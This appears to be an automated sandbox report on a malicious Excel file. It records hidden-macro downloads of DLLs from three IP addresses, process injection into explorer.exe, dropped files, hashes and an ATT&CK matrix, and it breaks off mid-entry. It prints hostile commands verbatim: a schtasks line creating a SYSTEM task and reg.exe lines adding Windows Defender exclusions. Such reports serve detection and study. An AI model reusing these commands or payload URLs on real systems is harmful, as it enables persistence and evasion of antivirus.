    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd1.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd2.redJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd1.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].datJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd2.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd1.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd2.redJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd1.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd.redJump to dropped file
    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\Drezd2.redJump to dropped file
    Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_100030B7 StartServiceCtrlDispatcherA,

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2124 base: DF102D value: E9 BA 4C 29 FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2988 base: DF102D value: E9 BA 4C 2F FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2544 base: DF102D value: E9 BA 4C 29 FF
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 284 base: DF102D value: E9 BA 4C 2F FF
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2088Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 840Thread sleep time: -100000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2692Thread sleep count: 47 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2904Thread sleep count: 71 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2536Thread sleep count: 52 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2936Thread sleep count: 63 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2936Thread sleep time: -104000s >= -30000s
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2116Thread sleep count: 50 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2428Thread sleep count: 99 > 30
    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2952Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2908Thread sleep count: 2670 > 30
    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 2908Thread sleep count: 2578 > 30
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].datJump to dropped file
    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 2670
    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 2578
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_000EAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFAD LoadLibraryA,GetProcAddress,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 8_2_005E4495 or ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_001D4495 or ebx, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00085A61 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regionsShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 80000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 80000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: DF102D
    Allocates memory in foreign processesShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)Show sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2124 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2124 base: DF102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2988 base: 80000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2988 base: DF102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2544 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2544 base: DF102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 284 base: 80000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 284 base: DF102D value: E9
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Compensation-2308017-09272021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd1.red
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd2.red
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
    Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: explorer.exe, 00000005.00000002.722944563.00000000010A0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000831C2 CreateNamedPipeA,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting2Windows Service3Extra Window Memory Injection1Disable or Modify Tools1Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Scheduled Task/Job1Windows Service3Scripting2LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution32Logon Script (Windows)Process Injection413Obfuscated Files or Information1Security Account ManagerSystem Information Discovery15SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsCommand and Scripting Interpreter11Logon Script (Mac)Scheduled Task/Job1File Deletion1NTDSSecurity Software Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
    Cloud AccountsScheduled Task/Job1Network Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaService Execution2Rc.commonRc.commonMasquerading131Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection413/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 491573 Sample: Compensation-2308017-09272021.xls Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 73 Document exploit detected (drops PE files) 2->73 75 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->75 77 Sigma detected: Schedule system process 2->77 79 7 other signatures 2->79 9 EXCEL.EXE 194 38 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 67 190.14.37.178, 49167, 80 OffshoreRacksSAPA Panama 9->67 69 185.183.96.67, 49168, 80 HSAE Netherlands 9->69 71 185.250.148.213, 49169, 80 FIRSTDC-ASRU Russian Federation 9->71 57 C:\Users\user\...\44466.7516903935[3].dat, PE32 9->57 dropped 59 C:\Users\user\...\44466.7516903935[2].dat, PE32 9->59 dropped 61 C:\Users\user\...\44466.7516903935[1].dat, PE32 9->61 dropped 95 Document exploit detected (UrlDownloadToFile) 9->95 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        32 regsvr32.exe 20->32         started        34 regsvr32.exe 22->34         started        87 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->87 89 Injects code into the Windows Explorer (explorer.exe) 24->89 91 Writes to foreign memory regions 24->91 93 2 other signatures 24->93 36 explorer.exe 8 1 24->36         started        process9 file10 97 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->97 99 Injects code into the Windows Explorer (explorer.exe) 29->99 101 Writes to foreign memory regions 29->101 39 explorer.exe 8 1 29->39         started        103 Allocates memory in foreign processes 32->103 105 Maps a DLL or memory area into another process 32->105 42 explorer.exe 32->42         started        45 WMIADAP.exe 4 32->45         started        47 explorer.exe 34->47         started        55 C:\Users\user\Drezd.red, PE32 36->55 dropped 107 Uses cmd line tools excessively to alter registry or file data 36->107 49 reg.exe 1 36->49         started        51 reg.exe 1 36->51         started        signatures11 process12 file13 81 Uses cmd line tools excessively to alter registry or file data 39->81 83 Drops PE files to the user root directory 39->83 85 Uses schtasks.exe or at.exe to add and modify task schedules 39->85 53 schtasks.exe 39->53         started        63 C:\Users\user\Drezd1.red, PE32 42->63 dropped 65 C:\Users\user\Drezd2.red, PE32 47->65 dropped signatures14 process15

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Compensation-2308017-09272021.xls0%ReversingLabs

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat100%Joe Sandbox ML
    C:\Users\user\Drezd.red9%ReversingLabs
    C:\Users\user\Drezd1.red9%ReversingLabs
    C:\Users\user\Drezd2.red9%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.%s.comPA0%URL Reputationsafe
    http://185.250.148.213/44466.7516903935.dat0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://185.183.96.67/44466.7516903935.dat0%Avira URL Cloudsafe
    http://190.14.37.178/44466.7516903935.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://185.250.148.213/44466.7516903935.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://185.183.96.67/44466.7516903935.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://190.14.37.178/44466.7516903935.datfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAregsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.449319415.0000000002170000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmpfalse
      		high
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.441359204.0000000001DB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.439921319.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.451658912.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.448814500.0000000001C80000.00000002.00020000.sdmpfalse
      • Avira URL Cloud: safe
      		low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      185.183.96.67
      		unknownNetherlands
      		60117HSAEfalse
      190.14.37.178
      		unknownPanama
      		52469OffshoreRacksSAPAfalse
      185.250.148.213
      		unknownRussian Federation
      		48430FIRSTDC-ASRUfalse

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:491573
      Start date:27.09.2021
      Start time:18:01:57
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 13m 55s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Compensation-2308017-09272021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:25
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@34/15@0/3
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 23.5% (good quality ratio 22.1%)
      • Quality average: 75.9%
      • Quality standard deviation: 28.1%
      HCA Information:
      • Successful, ratio: 85%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
      • TCP Packets have been reduced to 100
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      18:02:32API Interceptor58x Sleep call for process: regsvr32.exe modified
      18:02:34API Interceptor867x Sleep call for process: explorer.exe modified
      18:02:37Task SchedulerRun new task: icvxxob path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"
      18:02:37API Interceptor2x Sleep call for process: schtasks.exe modified
      18:03:20API Interceptor232x Sleep call for process: WMIADAP.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528531099414568
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M6:vs6Xpq0H3Jhds/9+qC/zfTPLo
      MD5:2B6A4F376AFCF41EAA504F31C09742EA
      SHA1:1689F9D6E949AC730E315CFFEFBB6300C3CCA262
      SHA-256:5302838FB3AD0C5EA363196FB161ECA41E392884E96590E7C231EDB2AE7B1EB7
      SHA-512:E14E146CD877D60BAEFD736F05616D54109FA3EA251DA8F1C8B55572A223B2328941233FCAD93DB9BF407F46D36223FF659FC27FD8BFC19EE5FEC66D84E6CB16
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):387072
      Entropy (8bit):4.528531099414568
      Encrypted:false
      SSDEEP:3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2M6:vs6Xpq0H3Jhds/9+qC/zfTPLo
      MD5:2B6A4F376AFCF41EAA504F31C09742EA
      SHA1:1689F9D6E949AC730E315CFFEFBB6300C3CCA262
      SHA-256:5302838FB3AD0C5EA363196FB161ECA41E392884E96590E7C231EDB2AE7B1EB7
      SHA-512:E14E146CD877D60BAEFD736F05616D54109FA3EA251DA8F1C8B55572A223B2328941233FCAD93DB9BF407F46D36223FF659FC27FD8BFC19EE5FEC66D84E6CB16
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Reputation:unknown
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
